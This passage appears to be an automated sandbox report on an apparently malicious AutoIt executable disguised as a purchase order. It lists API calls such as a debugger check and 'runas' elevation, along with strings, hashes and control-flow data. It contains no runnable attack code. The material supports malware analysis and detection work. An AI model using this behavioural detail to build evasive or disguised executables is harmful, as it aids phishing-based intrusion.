                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • _memmove.LIBCMT ref: 0040970C
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                            • _memmove.LIBCMT ref: 00409D96
                                                            • _memmove.LIBCMT ref: 0040A6C4
                                                            • _memmove.LIBCMT ref: 004297E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                            • String ID:
                                                            • API String ID: 2383988440-0
                                                            • Opcode ID: d0f8dd794343a1f84f8fd39c5974a53b1893f3fd9fc7d4c3d16f3697cfd53bab
                                                            • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                            • Opcode Fuzzy Hash: d0f8dd794343a1f84f8fd39c5974a53b1893f3fd9fc7d4c3d16f3697cfd53bab
                                                            • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                            Function 0040D590 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                              • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,00000104,?), ref: 00401F4C
                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                              • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                            • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                            • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                              • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                            • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                            • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                              • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                              • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                              • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                              • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                              • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                              • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                              • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                              • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                              • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                              • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                              • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                              • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                            • String ID: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                            • API String ID: 2495805114-980500672
                                                            • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                            • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                            • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                            • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                            Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1920 427693-427696 1915->1920 1921 427688-427691 1915->1921 1919 4276b4-4276be 1916->1919 1922 427625-427629 1917->1922 1923 40e59c-40e59f 1917->1923 1936 40e5ec-40e60c 1918->1936 1937 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1937 1938 4276c6-4276ca GetSystemInfo 1919->1938 1920->1919 1927 427698-4276a8 1920->1927 1921->1919 1929 427636-427640 1922->1929 1930 42762b-427631 1922->1930 1925 40e5a5-40e5ae 1923->1925 1926 427654-427657 1923->1926 1932 40e5b4 1925->1932 1933 427645-42764f 1925->1933 1926->1918 1931 42765d-42766f 1926->1931 1934 4276b0 1927->1934 1935 4276aa-4276ae 1927->1935 1929->1918 1930->1918 1931->1918 1932->1918 1933->1918 1934->1919 1935->1919 1939 40e612-40e623 call 40efd0 1936->1939 1940 4276d5-4276df GetSystemInfo 1936->1940 1937->1936 1947 40e5e8 1937->1947 1938->1940 1939->1938 1945 40e629-40e63f call 40ef90 GetNativeSystemInfo 1939->1945 1950 40e641-40e642 FreeLibrary 1945->1950 1951 40e644-40e651 1945->1951 1947->1936 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                            • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                            • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                            • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                            • String ID: 0SH
                                                            • API String ID: 3363477735-851180471
                                                            • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                            • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                            • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                            • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                            Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: IsThemeActive$uxtheme.dll
                                                            • API String ID: 2574300362-3542929980
                                                            • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                            • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                            • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                            • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                            Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                            • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                            • TranslateMessage.USER32(?), ref: 00409556
                                                            • DispatchMessageW.USER32(?), ref: 00409561
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Message$Peek$DispatchSleepTranslate
                                                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                            • API String ID: 1762048999-758534266
                                                            • Opcode ID: 55c8b9f035fddd0bd2ec632c8e27c8e0488d57d2ba9cbb7e48a93ed4745e3872
                                                            • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                            • Opcode Fuzzy Hash: 55c8b9f035fddd0bd2ec632c8e27c8e0488d57d2ba9cbb7e48a93ed4745e3872
                                                            • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                            Function 00401F20 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 214COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,00000104,?), ref: 00401F4C
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • __wcsicoll.LIBCMT ref: 00402007
                                                            • __wcsicoll.LIBCMT ref: 0040201D
                                                            • __wcsicoll.LIBCMT ref: 00402033
                                                              • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                            • __wcsicoll.LIBCMT ref: 00402049
                                                            • _wcscpy.LIBCMT ref: 0040207C
                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,00000104), ref: 00428B5B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Purchase order MIPO2425110032.exe$CMDLINE$CMDLINERAW
                                                            • API String ID: 3948761352-2678895026
                                                            • Opcode ID: c7db578a58d049c9f477fac5dc1f618de62341779cf4fb077178cc74bd876c41
                                                            • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                            • Opcode Fuzzy Hash: c7db578a58d049c9f477fac5dc1f618de62341779cf4fb077178cc74bd876c41
                                                            • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                            Function 00452719 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 147COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock$_fseek_wcscpy
                                                            • String ID: D)E$D)E$FILE
                                                            • API String ID: 3888824918-361185794
                                                            • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                            • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                            • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                            • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                            Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                            • __wsplitpath.LIBCMT ref: 0040E41C
                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                            • _wcsncat.LIBCMT ref: 0040E433
                                                            • __wmakepath.LIBCMT ref: 0040E44F
                                                              • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                            • _wcscpy.LIBCMT ref: 0040E487
                                                              • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                            • _wcscat.LIBCMT ref: 00427541
                                                            • _wcslen.LIBCMT ref: 00427551
                                                            • _wcslen.LIBCMT ref: 00427562
                                                            • _wcscat.LIBCMT ref: 0042757C
                                                            • _wcsncpy.LIBCMT ref: 004275BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                            • String ID: Include$\
                                                            • API String ID: 3173733714-3429789819
                                                            • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                            • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                            • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                            • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                            Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • _fseek.LIBCMT ref: 0045292B
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                            • __fread_nolock.LIBCMT ref: 00452961
                                                            • __fread_nolock.LIBCMT ref: 00452971
                                                            • __fread_nolock.LIBCMT ref: 0045298A
                                                            • __fread_nolock.LIBCMT ref: 004529A5
                                                            • _fseek.LIBCMT ref: 004529BF
                                                            • _malloc.LIBCMT ref: 004529CA
                                                            • _malloc.LIBCMT ref: 004529D6
                                                            • __fread_nolock.LIBCMT ref: 004529E7
                                                            • _free.LIBCMT ref: 00452A17
                                                            • _free.LIBCMT ref: 00452A20
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                            • String ID:
                                                            • API String ID: 1255752989-0
                                                            • Opcode ID: 3f43f4209565cf9930803292f55859f81113a3883ec0e7be7bac3bff720706a2
                                                            • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                            • Opcode Fuzzy Hash: 3f43f4209565cf9930803292f55859f81113a3883ec0e7be7bac3bff720706a2
                                                            • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                            Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                            • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                            • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                            • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                            • ImageList_ReplaceIcon.COMCTL32(00A9FE80,000000FF,00000000), ref: 00410552
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                            • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                            • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                            • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                            Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                            • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                            • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                            • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                            • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                            • RegisterClassExW.USER32(?), ref: 0041045D
                                                              • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                              • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                              • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
